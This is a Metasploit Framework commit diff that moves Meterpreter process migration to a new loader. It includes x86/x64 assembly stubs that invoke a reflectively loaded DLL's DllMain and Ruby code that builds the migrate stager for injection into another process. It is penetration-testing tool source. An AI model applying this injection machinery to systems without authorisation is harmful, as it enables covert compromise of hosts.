Update migration support

Migration now uses the new meterpreter loader. Migration configuration
is loaded and created by meterpreter on the fly, and supports the
multiple transport stuff that's just been wired in.

Author: OJ

lib/msf/core/payload/windows.rb

@@ -24,6 +24,8 @@ module Msf::Payload::Windows
   require 'msf/core/payload/windows/dllinject'
   require 'msf/core/payload/windows/exec'
   require 'msf/core/payload/windows/loadlibrary'
+  require 'msf/core/payload/windows/meterpreter_loader'
+  require 'msf/core/payload/windows/x64/meterpreter_loader'
   require 'msf/core/payload/windows/reflectivedllinject'
   require 'msf/core/payload/windows/x64/reflectivedllinject'
 

lib/msf/core/payload/windows/meterpreter_loader.rb

@@ -56,8 +56,7 @@ def asm_invoke_dll(opts={})
           push ebx              ; push the pointer to the configuration start
           push 4                ; indicate that we have attached
           push eax              ; push some arbitrary value for hInstance
-          mov ebx, eax          ; save DllMain for another call
-          call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
+          call eax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
     ^
   end
 

lib/msf/core/payload/windows/x64/meterpreter_loader.rb

@@ -49,15 +49,15 @@ def asm_invoke_dll(opts={})
           ; add the offset to ReflectiveLoader()
           add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
           call rbx              ; invoke ReflectiveLoader()
-        ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config)
+        ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
           ; offset from ReflectiveLoader() to the end of the DLL
           add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
-          mov dword ptr [rbx], edi        ; store the comms socket handle
+          ; store the comms socket handle
+          mov dword ptr [rbx], edi
           mov r8, rbx           ; r8 points to the extension list
-          mov rbx, rax          ; save DllMain for another call
           push 4                ; push up 4, indicate that we have attached
           pop rdx               ; pop 4 into rdx
-          call rbx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config)
+          call rax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
     ^
   end
 

lib/rex/payloads/meterpreter/config.rb

@@ -52,7 +52,7 @@ def transport_block(opts)
     # Build the URL from the given parameters, and pad it out to the
     # correct size
     lhost = opts[:lhost]
-    if lhost && Rex::Socket.is_ipv6?(lhost)
+    if lhost && opts[:scheme].start_with?('http') && Rex::Socket.is_ipv6?(lhost)
       lhost = "[#{lhost}]"
     end
 

lib/rex/post/meterpreter/client_core.rb

@@ -621,50 +621,17 @@ def generate_windows_stub(process)
 
     # Include the appropriate reflective dll injection module for the target process architecture...
     if process['arch'] == ARCH_X86
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
-      binary_suffix = "x86.dll"
+      c.include( ::Msf::Payload::Windows::MeterpreterLoader )
     elsif process['arch'] == ARCH_X86_64
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
-      binary_suffix = "x64.dll"
+      c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
     else
       raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
     end
 
     # Create the migrate stager
     migrate_stager = c.new()
 
-    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
-    if dll.nil?
-      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
-    end
-    migrate_stager.datastore['DLL'] = dll
-
-    blob = migrate_stager.stage_payload
-
-    if client.passive_service
-      # Patch options into metsrv for reverse HTTP payloads.
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service!(blob,
-        :ssl          => client.ssl,
-        :url          => self.client.url,
-        :expiration   => self.client.expiration,
-        :comm_timeout => self.client.comm_timeout,
-        :retry_total  => self.client.retry_total,
-        :retry_wait   => self.client.retry_wait,
-        :ua           => client.exploit_datastore['MeterpreterUserAgent'],
-        :proxy_host   => client.exploit_datastore['PayloadProxyHost'],
-        :proxy_port   => client.exploit_datastore['PayloadProxyPort'],
-        :proxy_type   => client.exploit_datastore['PayloadProxyType'],
-        :proxy_user   => client.exploit_datastore['PayloadProxyUser'],
-        :proxy_pass   => client.exploit_datastore['PayloadProxyPass'])
-    # This should be done by the reflective loader payloads
-    #else
-    #  # Just patch the timeouts, which are consistent on each of the payloads.
-    #  Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
-    #    :expiration   => self.client.expiration,
-    #    :comm_timeout => self.client.comm_timeout,
-    #    :retry_total  => self.client.retry_total,
-    #    :retry_wait   => self.client.retry_wait)
-    end
+    blob = migrate_stager.stage_meterpreter
 
     blob
   end
@@ -675,12 +642,6 @@ def generate_linux_stub
       f.read(f.stat.size)
     }
 
-    Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
-      :expiration   => self.client.expiration,
-      :comm_timeout => self.client.comm_timeout,
-      :retry_total  => self.client.retry_total,
-      :retry_wait   => self.client.retry_wait)
-
     blob
   end